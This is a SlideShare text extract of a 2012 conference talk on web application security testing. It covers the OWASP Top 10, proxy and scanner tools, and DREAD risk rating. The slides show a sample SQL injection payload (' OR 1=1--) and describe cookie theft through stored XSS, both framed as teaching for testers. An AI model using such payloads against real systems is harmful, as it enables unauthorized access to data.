Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
“Quality is the link to Success”                                   Copyright © 2012 Aware Corporation Ltd.
Agenda •   What kind of application security vulnerabilities should be tested? •   Methodology for testing •   Open source...
Testing Security       inWeb Applications                   Copyright © 2012 Aware Corporation Ltd.
Case Studies               Copyright © 2012 Aware Corporation Ltd.
Web ApplicationSecurity Testing                   Copyright © 2012 Aware Corporation Ltd.
Different Security Standards                               Copyright © 2012 Aware Corporation Ltd.
OWASP Top 10OWASP (Open Web Application Security Project) is an organization that provides unbiased andpractical, cost-eff...
OWASP Top 10 Testing                       Information                        Gathering                                   ...
Top Attacks    • SQL Injection       – SQL injection is a technique used to take advantage of non-validated input         ...
SQL Injection                                                                                                             ...
Cross Site Scripting            1   Attacker sets the trap – update my profile                                            ...
Authentication                 Copyright © 2012 Aware Corporation Ltd.
Tools Overview            Copyright © 2012 Aware Corporation Ltd.
Tools• Proxies  –   Burp Suite  –   Paros  –   WebScarab  –   Fiddler• FoxyProxy plugin• Open source scanners  – Skipfish ...
Burp Suite             http://portswigger.net/proxy/                                             Copyright © 2012 Aware Co...
Foxy Proxy         https://addons.mozilla.org/en-US/firefox/addon/2464/                                                   ...
Skip Fish  A fully automated, active web application security  reconnaissance tool                * Server-side SQL inject...
Cheat Sheet              Copyright © 2012 Aware Corporation Ltd.
Cheat Sheet              Copyright © 2012 Aware Corporation Ltd.
Tools Demonstration                 Copyright © 2012 Aware Corporation Ltd.
RISK• Discovering vulnerabilities is important, but just as  important is being able to estimate the associated risk to  t...
Prioritizing RISK                    Copyright © 2012 Aware Corporation Ltd.
Threat Risk      D amage potential      R eproducibility      E xploitability      A ffected users      D iscoverability  ...
Copyright © 2012 Aware Corporation Ltd.
Copyright © 2012 Aware Corporation Ltd.
Upcoming SlideShare
Loading in …5
×

Web Application Security Testing - Aware in BugDay Bangkok 2012

1,601 views

Published on

Published in: Technology
  • Be the first to comment

Web Application Security Testing - Aware in BugDay Bangkok 2012

  1. 1. “Quality is the link to Success” Copyright © 2012 Aware Corporation Ltd.
  2. 2. Agenda • What kind of application security vulnerabilities should be tested? • Methodology for testing • Open source tools available • Prioritizing application security defects Copyright © 2012 Aware Corporation Ltd.
  3. 3. Testing Security inWeb Applications Copyright © 2012 Aware Corporation Ltd.
  4. 4. Case Studies Copyright © 2012 Aware Corporation Ltd.
  5. 5. Web ApplicationSecurity Testing Copyright © 2012 Aware Corporation Ltd.
  6. 6. Different Security Standards Copyright © 2012 Aware Corporation Ltd.
  7. 7. OWASP Top 10OWASP (Open Web Application Security Project) is an organization that provides unbiased andpractical, cost-effective information about computer and Internet applications. Project membersinclude a variety of security experts from around the world who share their knowledge ofvulnerabilities, threats, attacks and countermeasures. http://www.owasp.org Copyright © 2012 Aware Corporation Ltd.
  8. 8. OWASP Top 10 Testing Information Gathering Configuration Web Services Management Divided in 9 Sub CategoriesDenial of Authentication AndService 66 Controls Data Session Validation Management Business Authorization Logic Copyright © 2012 Aware Corporation Ltd.
  9. 9. Top Attacks • SQL Injection – SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. • Cross Site Scripting – Cross-site scripting (XSS) is a type of computer insecurity vulnerability typically found in Web applications (such as web browsers through breaches of browser security) that enables attackers to inject client-side script into Web pages viewed by other users. • Authentication – Authentication and session management includes all aspects of handling user authentication and managing active sessions. Authentication is a critical aspect of this process, but even solid authentication mechanisms can be undermined by flawed credential management functions Copyright © 2012 Aware Corporation Ltd.
  10. 10. SQL Injection Account: SKU: 1. Application presents a Account: form to the attackerApplication Layer Knowledge Mgmt Communication HTTP Legacy Systems Administration Bus. Functions HTTP DB Table SKU: E-Commerce Web Services Transactions SQL response 2. Attacker sends an Directories  Accounts Databases request Finance   APPLICATION query   ATTACK  attack in the form data Custom Code 3. Application forwards "SELECT * FROM accounts WHERE attack to the database in Human Resrcs App Server acct=‘’ OR 1=1-- a SQL query ’" 4. Database runs query Billing Web Server Hardened OS containing attack andNetwork Layer Account Summary sends encrypted results Acct:5424-6066-2134-4334 back to application Acct:4128-7574-3921-0192 Acct:5424-9383-2039-4029 5. Application decrypts Firewall Firewall Acct:4128-0004-1234-0293 data as normal and sends results to the user Copyright © 2012 Aware Corporation Ltd.
  11. 11. Cross Site Scripting 1 Attacker sets the trap – update my profile Application with stored XSS Attacker enters a vulnerability malicious script into a web page that stores the data on the server Knowledge Mgmt Communication Administration Bus. Functions E-Commerce Transactions 2 Victim views page – sees attacker profile Accounts Finance Custom Code Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie Copyright © 2012 Aware Corporation Ltd.
  12. 12. Authentication Copyright © 2012 Aware Corporation Ltd.
  13. 13. Tools Overview Copyright © 2012 Aware Corporation Ltd.
  14. 14. Tools• Proxies – Burp Suite – Paros – WebScarab – Fiddler• FoxyProxy plugin• Open source scanners – Skipfish Copyright © 2012 Aware Corporation Ltd.
  15. 15. Burp Suite http://portswigger.net/proxy/ Copyright © 2012 Aware Corporation Ltd.
  16. 16. Foxy Proxy https://addons.mozilla.org/en-US/firefox/addon/2464/ Copyright © 2012 Aware Corporation Ltd.
  17. 17. Skip Fish A fully automated, active web application security reconnaissance tool * Server-side SQL injection (including blind vectors, numerical parameters). * Stored and reflected XSS * Directory listing bypass vectors. * External untrusted embedded content. http://code.google.com/p/skipfish/ Copyright © 2012 Aware Corporation Ltd.
  18. 18. Cheat Sheet Copyright © 2012 Aware Corporation Ltd.
  19. 19. Cheat Sheet Copyright © 2012 Aware Corporation Ltd.
  20. 20. Tools Demonstration Copyright © 2012 Aware Corporation Ltd.
  21. 21. RISK• Discovering vulnerabilities is important, but just as important is being able to estimate the associated risk to the business. Risk = Likelihood * Impact Copyright © 2012 Aware Corporation Ltd.
  22. 22. Prioritizing RISK Copyright © 2012 Aware Corporation Ltd.
  23. 23. Threat Risk D amage potential R eproducibility E xploitability A ffected users D iscoverability Copyright © 2012 Aware Corporation Ltd.
  24. 24. Copyright © 2012 Aware Corporation Ltd.
  25. 25. Copyright © 2012 Aware Corporation Ltd.

×